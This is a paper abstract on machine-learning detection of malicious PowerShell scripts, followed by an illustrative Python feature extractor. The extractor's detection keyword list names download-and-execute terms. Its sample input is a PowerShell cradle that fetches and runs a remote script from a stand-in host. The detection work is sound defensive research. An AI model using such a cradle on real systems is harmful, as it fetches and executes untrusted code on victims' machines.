Machine Learning Approaches to Malicious PowerShell Scripts Detection and Feature Combination Analysis

Hsiang-Hua Hung, Yi-Wei Ma, Jiann-Liang Chen

doi:10.53106/160792642024012501014

Abstract

With advances in communication technology, modern society relies more than ever on the Internet and various user-friendly digital tools. PowerShell provides access to, and enables the manipulation of, files, trips, and the Windows API. Attackers frequently apply various obfuscation techniques to PowerShell scripts to avoid detection by anti-virus software, which can significantly reduce the readability of the script. This work statically analyzes PowerShell scripts. Thirty-three features based on the script's keywords, format, and string combinations are used to determine the behavioral intent of a script. Some are characteristic-based features that are obtained by calculation; the others are behavior-based features that determine the function a script executes from its keywords and instructions. Behavior-based features are divided into positive, neutral, and negative behavior-based features. These three types are enhanced by observing samples and adding keywords. The characteristic-based features are calculated with formulas introduced from other studies. The XGBoost model is used to evaluate the importance of the proposed features and to identify the combination of features that contributes most to the detection of malicious PowerShell scripts. The final model with the combined features exhibits the best performance, with 99.27% accuracy on the validation dataset. The results indicate that the proposed malicious PowerShell script detection model outperforms previously developed models.
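
The two feature families described above can be illustrated with a minimal sketch. It is not the authors' implementation: the keyword lists, the feature names, and the choice of Shannon entropy and special-character ratio as characteristic-based measures are all assumptions made for illustration, and the paper's thirty-three features are not reproduced here.

```python
import math
import re
from collections import Counter

# Hypothetical keyword lists, chosen only for illustration.
# They are NOT the keyword sets used in the paper.
NEGATIVE_KEYWORDS = {"iex", "invoke-expression", "downloadstring", "frombase64string"}
NEUTRAL_KEYWORDS = {"new-object", "get-content", "start-process"}
POSITIVE_KEYWORDS = {"write-host", "get-help", "param"}


def shannon_entropy(text):
    """Shannon entropy in bits per character (assumed characteristic-based feature)."""
    if not text:
        return 0.0
    total = len(text)
    counts = Counter(text)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def count_hits(tokens, keywords):
    """Count how many tokens appear in a keyword set."""
    return sum(1 for token in tokens if token in keywords)


def extract_features(script):
    """Build a small static feature dictionary from raw PowerShell source text."""
    # Lower-case the script and split it into word-like tokens (hyphens kept,
    # so cmdlet names such as "new-object" stay in one piece).
    tokens = re.findall(r"[a-z0-9_\-]+", script.lower())
    special = sum(1 for ch in script if not ch.isalnum() and not ch.isspace())
    return {
        # Characteristic-based features: obtained by calculation.
        "length": len(script),
        "entropy": shannon_entropy(script),
        "special_char_ratio": special / len(script) if script else 0.0,
        # Behavior-based features: keyword and instruction matches.
        "negative_hits": count_hits(tokens, NEGATIVE_KEYWORDS),
        "neutral_hits": count_hits(tokens, NEUTRAL_KEYWORDS),
        "positive_hits": count_hits(tokens, POSITIVE_KEYWORDS),
    }


if __name__ == "__main__":
    sample = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
    print(extract_features(sample))
```

Feature dictionaries of this kind could be stacked into a matrix and passed to a gradient-boosted classifier such as XGBoost, whose per-feature importance scores would then support the kind of feature-combination analysis the abstract describes.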
